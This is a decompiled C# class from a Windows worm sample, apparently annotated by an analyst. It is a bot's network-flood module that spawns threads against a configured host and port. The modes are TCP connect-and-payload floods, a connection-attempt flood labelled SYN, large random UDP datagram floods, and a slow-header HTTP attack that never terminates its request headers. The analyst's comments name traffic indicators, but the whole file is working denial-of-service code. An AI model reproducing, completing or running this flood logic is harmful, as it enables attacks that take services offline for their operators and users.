MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/Ј໺঳ᝮᢶᯀ.cs

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.Ј໺঳ᝮᢶᯀ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Net.Sockets;
using System.Text;
using System.Threading;
namespace Ҧ߲ʽ
{
internal class Ј\u0EFA\u09B3ᝮᢶᯀ
{
// Shared static state read by every worker thread of this network-flood module.
// The roles below are inferred from how the visible methods use each field; the
// identifiers are obfuscator output and carry no meaning of their own.
// Selected traffic mode (one of the four members of the enum nested at the end of this class).
private static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C Ç\u09F5ࠍ\u0082;
// Run flag: cleared by the configure and stop methods, set by the start method, polled by the workers.
private static bool \u1AA0;
// Destination host: passed as the first argument to Socket.Connect/BeginConnect and written into the HTTP "Host:" header.
private static string ɀ\u0F30;
// Destination port: passed as the second argument to Socket.Connect/BeginConnect.
private static int \u0EEBΝᝧԠ;
// Number of worker threads the spawner tries to create.
private static int \u1087;
// Pause in milliseconds (Thread.Sleep argument) taken by a worker after each burst.
private static int ɱ\u1A8Aᙦ;
// Upper bound on sends per burst in the TCP-payload and UDP modes.
private static int \u0027;
// Object of a type declared outside this file; the workers poll its member \u0557 as a boolean gate.
// NOTE(review): the field name is not visible in this listing (likely non-printable characters); presumably
// this is the bot's controller/connection state — confirm against the rest of the assembly.
private static \u07F6\u181Fᒸৃ ;
// Obfuscated string table (28 entries). The HTTP request builder in this class decodes one
// entry per request through the external helper \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(..., true) and appends it,
// after a space, to the User-Agent value.
// Entries 11-20 repeat the second entry with a digit 0-9 inserted before the closing bracket, and
// entries 21-28 repeat the third entry with a digit 0-7, so the table holds ten distinct base
// strings plus numbered variants.
// NOTE(review): the encoding is not plain Base64 (characters follow the '=' padding in entries 21-28);
// the decoder is defined outside this file, so the clear-text values are not established here.
private static string[] \u0942 = new string[28]
{
"[W5aioKOUp5yVn5huU4CGfHgznRO9U2lhY25Tipyhl6KqplOBh1w=]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==]",
"[OV6Ac3p9dmF5gH92MWRUYT5GRkFBQGZkQEI/QToxX3aFV4OAf4VARD9BMV5eYUBDP0ExOXSAfhE/sm2BcoV6c312TDFYgIB4fXZzgIVAQz9CTDF5hYWBS0BAiIiIP3iAgHh9dj90gH5Ac4CFP3mFfn06]",
"[bHZ/bjE5aBE/sm16f19lTDFmOg==]",
"[OXSAfoFyhXpzfXZMMV5kWlYxSD9BTBE/sm0xaHp/dYCIhDFfZTFGP0JMMXN4d4U6MQ==]",
"[OXSAfoFyhXpzfXZMMV4RP7JtZFpWMUc/QUwxaHp/REM6]",
"[OWlCQkwxZkwxXXp/hokxQz9FP0M+QzF6RklHTDF2fz5mZEwRP7JtMX5CSToxWHZ0fIBAQ0FBQkFCREIxX3aFhHRygXZHQEc/QUI=]",
"[OWlCQkwxZkwxXXp/hokxekdJR0wxdn8+ZmQRP7JtTDGDh0tBP0o/RDoxWHZ0fIBAQ0FBQkFJQUI=]",
"[OWSGf2BkMUY/STGEhn9FhkwRP7JtMWY6MWCBdoNyMUY/QTFsdn9u]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo0]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo1]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo2]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo3]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo4]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo5]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo6]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo7]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo8]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo9]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==0]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==1]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==2]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==3]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==4]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==5]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==6]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==7]"
};
// Obfuscated string table (10 entries). The HTTP request builder in this class decodes one entry
// per request through the external helper \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(..., true) and uses it as the
// leading part of the User-Agent value.
// The entries fall into three groups by shared prefix (3, 3 and 4 entries), which suggests three
// base strings with small suffix variations — presumably product/version tokens; the decoder is
// defined outside this file, so the clear-text values are not established here.
private static string[] \u0669ѹᏲբ݅ = new string[10]
{
"[udvm1djYbAzPpc2bn5qcjA==]",
"[udvm1djYbAzPpc2bn5qdjA==]",
"[udvm1djYbAzPpc2bn5qijA==]",
"[JUdSQURE2DvBDTkHDAYI+A==]",
"[JUdSQURE2DvBDTkHDAYIEPg=]",
"[JUdSQURE2DvBDTkHDQYI+A==]",
"[J0g9SjnYO8ENBxEGCwv4]",
"[J0g9SjnYO8ENBxEGCPg=]",
"[J0g9SjnYO8ENBxAGEQj4]",
"[J0g9SjnYO8ENBxEGEAj4]"
};
// Read-only accessor for the currently configured traffic mode.
public static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C \u083A\u0606ᓙ\u0F03 => Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082;
// Returns a display string for the configured mode: each case passes a literal through the external
// string helper \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(..., true) and returns the result; an unrecognised mode yields null.
// Only the second mode's literal is readable as written ("[SYN]"); the other three are encoded.
// NOTE(review): presumably these are the mode names reported back to the operator — confirm where
// this property is read elsewhere in the assembly.
public static string \u0E4BᡐḼ
{
get
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Eb314QAADQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("[SYN]", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Er314QABDQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("ECksNL314QApLC8mMA==", true);
default:
return (string) null;
}
}
}
// Read-only accessor for the run flag (true between the start call and the next stop/configure call).
public static bool ͕IJ\u0ADFধ => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0;
// Configures the module: stores the arguments in the static fields and clears the run flag.
// Parameter roles, as established by how the fields are used elsewhere in this class:
//   _param0 - traffic mode
//   _param1 - destination host
//   _param2 - destination port
//   _param3 - worker thread count
//   _param4 - maximum sends per burst
//   _param5 - pause after each burst, in milliseconds
//   _param6 - external object whose boolean member gates the workers
// No argument is validated here. Note that _param4 and _param5 are stored in the opposite order
// to the field declarations, which matters when mapping captured command arguments to behaviour.
public static void ޚ\u1A8E\u1361\u0B12\u007F\u05EB(
Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C _param0,
string _param1,
int _param2,
int _param3,
int _param4,
int _param5,
\u07F6\u181Fᒸৃ _param6)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082 = _param0;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30 = _param1;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ = _param2;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = _param3;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 = _param4;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ = _param5;
Ј\u0EFA\u09B3ᝮᢶᯀ. = _param6;
// Configuring always leaves the module stopped; workers only run after the start method sets the flag.
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
}
// Starts the module: sets the run flag, then runs the worker spawner on a new thread so the
// caller is not blocked while the workers are created. The spawner thread is left as a
// foreground thread (IsBackground is not set here), unlike the workers it creates.
public static void ŝʊ()
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = true;
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.șȓ)).Start();
}
// Stops the module by clearing the run flag; workers notice it at their next loop check
// rather than being interrupted.
public static void ϊ() => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
// Spawner: creates up to the configured number of worker threads, each running the worker loop.
// Workers are marked IsBackground, so they do not keep the host process alive on their own.
// Host-side indicator: a sudden jump in the thread count of the infected process.
private static void șȓ()
{
for (int index = 0; index < Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087; ++index)
{
try
{
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.\u16FA))
{
IsBackground = true
}.Start();
}
catch (OutOfMemoryException ex)
{
// Thread creation ran out of memory: record a reduced thread count (index - 1) and stop spawning.
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = index - 1;
break;
}
}
}
// Worker loop run by every spawned thread. While the run flag and the external gate member are
// both true, it performs one burst in the configured mode, sleeps for the configured pause, and
// repeats. Four modes are implemented:
//   1st enum member - TCP connect followed by a random payload
//   2nd enum member - TCP connection attempt only (the mode labelled "[SYN]" by the name property)
//   3rd enum member - UDP datagrams with random payloads
//   4th enum member - HTTP GET whose header block is never terminated, re-sent every 2 s
// All sockets are IPv4 (AddressFamily.InterNetwork). Exceptions are swallowed by bare catch
// blocks, so network errors never surface to the rest of the program.
private static void \u16FA()
{
// Sends completed in the current burst; reset to 0 after every pass through the switch.
int num = 0;
while (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
// TCP payload mode: one socket is created per burst and switched to non-blocking.
Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket1.Blocking = false;
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
try
{
socket1.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket1.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ());
socket1.Close();
// The reference is dropped after a successful send, so a further iteration of this
// inner loop has no socket to use and ends up in the catch block below.
socket1 = (Socket) null;
}
catch
{
// NOTE(review): on a non-blocking socket a synchronous Connect normally throws before the
// handshake completes, so this close-and-break path is presumably the common one and each
// burst shows up on the wire as a connection attempt — confirm against captured traffic.
socket1.Close();
break;
}
++num;
Thread.Sleep(1);
}
else
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
// Connection-attempt mode: start an asynchronous connect, wait 100 ms, then tear the socket
// down whether or not the connection completed. No application data is sent.
Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket2.Blocking = false;
try
{
socket2.BeginConnect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ, new AsyncCallback(Ј\u0EFA\u09B3ᝮᢶᯀ.\u1759ໞ\u060Fᣊ\u1B5B), (object) null);
}
catch
{
}
Thread.Sleep(100);
try
{
if (socket2.Connected)
socket2.Disconnect(false);
socket2.Close();
}
catch
{
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
// UDP mode: one socket per burst, up to the configured number of random-payload datagrams
// sent 1 ms apart to the configured host and port.
Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
socket3.Blocking = false;
// socket4 is only ever assigned null and never read (decompiler artifact).
Socket socket4;
try
{
socket3.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket3.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0738Зܫ\u0837ᚖųᮝ());
++num;
Thread.Sleep(1);
}
socket3.Close();
socket4 = (Socket) null;
}
catch
{
// On any error the burst is abandoned without the post-burst pause.
socket3.Close();
socket4 = (Socket) null;
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
// HTTP mode: open one blocking TCP connection, send the generated request, then send a
// freshly generated request on the same connection every 2000 ms for as long as the socket
// reports Connected and both the run flag and the gate stay true.
// NOTE(review): because the generated request never ends its header block, this resembles a
// slow-header connection-holding pattern — confirm against captured traffic.
Socket socket5 = (Socket) null;
try
{
socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket5.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
while (socket5.Connected)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
Thread.Sleep(2000);
}
else
break;
}
else
break;
}
}
catch
{
// The socket is closed only on this exception path; when the loop above ends normally the
// socket is left open for the runtime to reclaim.
socket5.Close();
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
}
num = 0;
}
// Reached when the run flag or the external gate went false. If the flag is still set, the gate
// was the cause, and this worker clears the flag so that all other workers stop as well.
if (!Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
return;
Ј\u0EFA\u09B3ᝮᢶᯀ.ϊ();
}
// Completion callback handed to Socket.BeginConnect by the connection-attempt mode.
// It is intentionally empty: the result of the connect is never inspected and EndConnect is never called.
private static void \u1759ໞ\u060Fᣊ\u1B5B(IAsyncResult _param0)
{
}
// Builds the payload for the UDP mode: a buffer of random length between 1470 and 65506 bytes
// (Random.Next excludes its upper bound) filled with pseudo-random bytes.
// Network indicator: UDP datagrams of at least 1470 payload bytes with high-entropy content, sent
// to a single host and port.
// NOTE(review): a new Random is created on every call; on runtimes that seed the parameterless
// constructor from the clock, calls made close together can yield identical buffers — confirm
// against the sample's target runtime.
private static byte[] \u0738Зܫ\u0837ᚖųᮝ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, 65507)];
random.NextBytes(buffer);
return buffer;
}
// Builds the payload for the TCP payload mode: a buffer of random length between 1470 and 65534
// bytes (Random.Next excludes its upper bound, ushort.MaxValue) filled with pseudo-random bytes.
// Same construction as the UDP payload builder apart from the upper length bound.
private static byte[] \u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
random.NextBytes(buffer);
return buffer;
}
// Builds the ASCII-encoded request sent by the HTTP mode. Traits visible here that can be matched
// in proxy, WAF or packet-capture data:
//   - request line is always "GET / HTTP/1.1";
//   - a Content-Length header (random 1-999) is present although a GET carries no body here;
//   - a non-standard "X-a:" header carries a random number between 1 and 9999;
//   - the last header, "Connection: keep-alive", is written with Append rather than AppendLine, so the
//     header block is never closed by an empty line and the server keeps waiting for more headers;
//   - User-Agent is "<decoded entry of the 10-entry table> <decoded entry of the 28-entry table>".
// Random.Next excludes its upper bound, so with "Length - 1" the last entry of each table is never chosen.
// The host name is written into the Host header exactly as configured.
private static byte[] \u0826Ꮽ\u0B72\u1AC1ଲ()
{
Random random = new Random();
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.AppendLine("GET / HTTP/1.1");
stringBuilder.AppendLine("Host: " + Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30);
stringBuilder.AppendLine("User-Agent: " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅.Length - 1)], true) + " " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942.Length - 1)], true));
stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
stringBuilder.Append("Connection: keep-alive");
return Encoding.ASCII.GetBytes(stringBuilder.ToString());
}
// Traffic modes understood by the worker loop. The member names are obfuscated; the descriptions
// below come from the matching case branches in the worker loop of this class.
public enum ք\u0609ǟ\u175C
{
// Value 0: TCP connect followed by a random payload.
\u0307جᢦ౯᥏\u0DB2,
// Value 1: TCP connection attempt only, no data (labelled "[SYN]" by the mode-name property).
\u0E86ᐪᬞ\u0F0Dਞ,
// Value 2: UDP datagrams with random payloads.
\u0C8D\u0AC6ᩬ\u1A5Fᔅ,
// Value 3: HTTP GET with an unterminated header block, repeated on one connection.
ľ\u1C99\u1B67șՔᘱ݆ߜ,
}
}
}